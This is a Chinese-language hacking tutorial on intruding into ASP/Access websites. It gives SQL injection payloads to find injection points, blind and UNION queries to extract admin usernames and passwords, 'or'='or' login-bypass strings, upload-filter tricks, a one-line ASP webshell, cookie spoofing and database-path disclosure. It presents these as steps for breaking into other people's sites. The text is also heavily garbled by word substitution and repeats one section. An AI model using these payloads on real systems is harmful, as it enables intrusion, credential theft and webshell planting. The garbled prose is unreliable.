SQL注入

本文由zoujialan贡献
壹 、注入点的判断及猜解
1.加盟单引号 ’提交,
结果:借使出现谬误提醒,则该网站只怕就存在注入漏洞。
2.数字型判断是还是不是有注入;
语句:and 1=1 ;and 1=2 (经典)、’ and ‘1’=1(字符型)
结果:分别重临不一致的页面,表明存在注入漏洞.
剖析:and 的意思是“和”倘诺没有过滤大家的语句,and 1=1就会被代入SQL查询语句举行询问,
假定and前后的两条语句都以真的话就不会出错,但假诺前后语句有一个为假的话,程序就会暴错。
也就标明程序有注入漏洞
防注入化解办法:
1>使用or 2>1 ; or 1>2来开始展览判定
  结果:分别重回分化的页面,表达存在注入漏洞.
  分析:or注入只须要前后七个语句即使有七个不利就为真,如果前后几个语句都以毋庸置疑的,反而为
假。
   记住:or注入时,or前边的说话假如是不利的,则赶回错误页面!如若是错误,则赶回正确页面
,表明存在注入点。
2> 使用xor 1=1; xor 1=2
   结果:分别重返分化的页面,表明存在注入漏洞.
   分析:xor 代表着异或,意思即一而再的表明式仅有贰个为实在时候才为真。
   记住:xor注入时,xor前面包车型地铁口舌假使是科学的,则赶回错误页面积,就算是一无所能,则赶回正确
页面,表达存在注入点。
3>把and 1=1转换来U中华VL编码情势后在交付
  and 1=1 URL编码:%41%4E%44%20%%31%3D%31
4>使用-1;-0
  分析:假使回到的页面和日前分歧,是另一则音信,则代表有注入漏洞,是数字型的注入漏洞;在 
URubiconL地址前边加上 -0,U哈弗L变成 news.asp?id=123-0,重返的页面和前边的
页面相同,加上-1,重返错误页面,则也代表存在注入漏洞.
3.字符型判断是不是有注入:
  语句:’ and ‘1’=1;’ and  ‘1=2(经典)
  结果:结果:分别再次回到差别的页面,表达存在注入漏洞.
  分析:到场’ and ‘1’=1赶回正确页面,参预’ and  ‘1=叁次到错误页面,说明有注入漏同。
  防注入消除办法:
  1>在U凯雷德L的地方后边加上’%2B’(字符型)
  分析:URubiconL地址变为:news.asp?id=123’%2B’,重临的页面和1同;加
上’2%2B’asdf,URAV4L地址变为:news.asp?id=123’%2Basdf,再次回到的页面和1
今非昔比,恐怕说未察觉该条记录,大概失实,则意味着存在注入点,是文本型的。
4.搜索型判断是或不是有注入:
大概的判断搜索型注入漏洞存在不存在的方法是先搜索’,假使出错,表达9/10设有那么些漏洞。然后搜
索%,若是不荒谬重临,表达95%有洞了。
说明:加入如”&;”、”[“、”]”、”%”、”$”、”@”等特殊字符,都得以兑现,如果出现错误,表明有标题
操作:
检索多少个主要字,比如二零零七吧,日常再次回到全体2007皮之不存毛将焉附的音信,再寻觅2007%’and 1=1 and ‘%’=’和
2005%’and 1=2 and ‘%’=’,存在异议的话,就是百分百有洞了。
关键字%’ and 1=1 and ‘%’=’%
关键字%’ and 1=2 and ‘%’=’%
将and 1=1 换来注入语句就足以了
5.论断数据库类型:and user>0  例如:showdetail.asp?id=49 ;and user>0 
要是是ACCESS数据库,那么重回的荒谬里一般会有”Microsoft JET Database”关键定,假如是MSSQL数
据库的话再次来到的不当提醒里一般会蕴藏”SQL Server”关键了.
6.猜表名 and exists (select * from 表名)
  表达:意思与地方一样,只是用的语名不均等。
7.猜列名 and (select count(列名) from 表名)>0
  表达:借使大家输入的列名猜解正确否反回通常页面
8.猜长度 and (select top 1 len(username) from admin)>0
  表达:假诺大家输入的最后一个人数据重回错误,而不当前一个人数字再次回到正确,表达笔者所猜解的长短
为正确。
9.猜内容 and (select top 1 asc(mid(username,1,1)) from admin)>50 ascii码1-128
  表明:如若我们输入的尾声一个人数据再次来到错误,而不当前1人数字再次回到正确,表明本身所猜解的数字
毋庸置疑。(能够应用折半法猜内容)
折半法:最小值与最大值差的二分之一,比如输入50返正确,输入100再次来到错误,折半后输入75。
10.共同查询注入(union查询)
操作步骤:
1>在正规说话后台加入 and 1=2 union select * form 表名,其中*号表示字段数量,从1一向扩充
(and 1=2 union select 1,2,3,4 form 表名)要是字段数正确就会有暴错。
2>在页面彰显数字的地方用诚实获得的字段名代替,如:username,password.
3>在页面字段值处暴出真正的数据库字段值。
二 、查找后台地址,找到后台用收获的用户管理员的帐户与密码实行登陆.
三、上传WEBSHELL
方式主要有:
1.上传漏洞: 要是看到:接纳你要上传的文件 [双重上传]要么现身“请登陆后使用”,4/5就有尾巴
了! 有时上传不一定会马到成功,那是因为Cookies不一致.大家将要用WSockExpert取得Cookies.再用 
DOMAIN上传或是大庆老兵上传工具.
1>上传漏洞的公文
  动网是upfile.asp。
  动易是在upfile_soft.asp,(软件上传漏洞)upfile_softpic.asp(图片上传漏洞)
  动感是在uploadflash.asp,upfile_flash.asp,利用抓包工具抓包拿走cookies,再用   DOMAIN上
传或是南阳红军上传工具
2>添加上传类型
  asa|asaspp
3>就是在上传时在后缀前边加空格只怕加几点,或者也会有惊呆的觉察。例:*.asp ,*.asp..。
4>上传图片文件木马,使用备份数据库获得asp文件
2.cookies欺骗
  使用cookies能够达到规定的标准让网站认识你的指标。可是一旦cookies验证不足就会形成cookies欺骗。用  
到工具 衡阳老兵cookies欺骗工具。
3.%5c暴库
  把二级目录中间的/换来%5c EY:otherweb … s.asp?BigClassName=职
责范围&;BigClassType=1 若是你能观察:’E:\ahttc040901
\otherweb\dz\database\iXuEr_Studio.asa’不是3个有效的 路径。 明确路径名称拼写是或不是正确,
以及是不是 连接到文件存放的服务器。 那样的正是数据库了。下载时用FLASHGET换到.MDB格式的就行

4.conn.asp暴库
  那些也是比较老的漏洞,利用市场股票总值非常的小
5.’or’=’or’万能密码登陆
  ’or’=’or’那是1个方可连绵不断SQL的语名句.能够直接进入后台。作者搜集了须臾间。类似的还有 : 
  ’or’’=’ ” or “a”=”a ’) or (’a’=’a “) or (“a”=”a or 1=1– ’ or ’ a’=’a  
  三个很老的使用格局,主要用来一些比较老的网站。
6.旁注,也等于跨站. 大家凌犯某站时只怕这么些站坚固的无懈可击,大家能够找下和这么些站同一服务
器的站点,然后在利 用那么些站点用提权,嗅探等方法来凌犯大家 要凌犯的站点。,在那边有个难点
,便是某个服务器 的相对路径经过加密,那就看大家的本事了 
7.写入ASP格式数据库。正是一句话木马[〈%execute request(“value”)%〉 ],常用在留言本. 如:
以此便是ASP格式的数据库或许能够写入内容的
ASP文件,如南方数据的类别布局],再写 入一句话木马.
8.旁注,也正是跨站. 大家入侵某站时或者这么些站坚固的无懈可击,大家得以找下和那一个站同一服务
器的站点,然后在利 用这一个站点用提权,嗅探等格局来侵袭大家 要凌犯的站点。,在那边有个困难
,便是一些劳务器 的相对路径经过加密,那就看大家的本事了
④ 、整站利用
    动网BBS 能够先用:dvbbs权限进步工具,使自已成为前 
   台管理员。 THEN,运用:动网固顶贴工具,找个固顶贴,再拿走首席营业官KIES,那么些要你自已做。小编   
们能够用 WSockExpert取得Cookies/NC包 那一个自个儿就不做了,网上教程多的是,自已下个看看。     
工具:dvbbs权限进步工具 动网固顶贴工具
总结:
个人觉得ACCESS网站注比不是很灵活,方法大家都掌握,针对国内的网站以来大家能够到网站物色
网站是选择什么程序改过来的,今后一般都以运用已经存在的商店网站系列来展开修改。

下一篇整理MSSQL注入方法,MSSQL注入拾叁分的灵巧,作用也越发强大.只要找到注入点,一般
意况下是足以拿下来的,

相关文章